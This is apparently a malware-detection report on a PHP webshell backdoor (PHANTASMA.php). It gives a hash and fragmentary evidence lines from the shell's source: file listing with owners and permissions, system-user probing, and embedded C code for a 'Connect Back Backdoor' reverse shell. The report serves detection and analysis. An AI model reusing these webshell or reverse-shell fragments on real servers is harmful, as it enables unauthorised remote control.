Backdoor.PHP.Exploiter.a
Known PHP webshell backdoor
PHP Webshells Github Archive - file PHANTASMA.phpPHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k
SHA-2562a0dc0e5e4ef9ed7420c17a986978feb2f187b50439b6aa453ab8d039cf6370d
MaleculeTh
Evidence
6:83… sp;
7 /j #virus #Ashiyane</font></span></p>
8 <p><font color="#FF0000"><b>[email protected]<BR>
9 </b></font></DIV>
10<?php
11
12//
13 closelog( );
14
15 $dono = get_current_user( );
16 $ver = phpversion( );
17 $login = posix_getuid( );
⋯10 lines
122:12… (@is_file($file)) {
123 $file1 = fileowner($file);
124 $file2 = fileperms($file);
125 echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
126 // echo "<font color=green>$file1 - $file2 - $file </font><br>";
127 flush( );
⋯7 lines
200:11… " printf(\"Haji virus Connect Back Backdoor\\n\\n\");\n" .
201 " if (argc < 2 || argc > 3) {\n" .
202 " printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
203 " return 1;\n" .
204 " }\n" .
⋯4 lines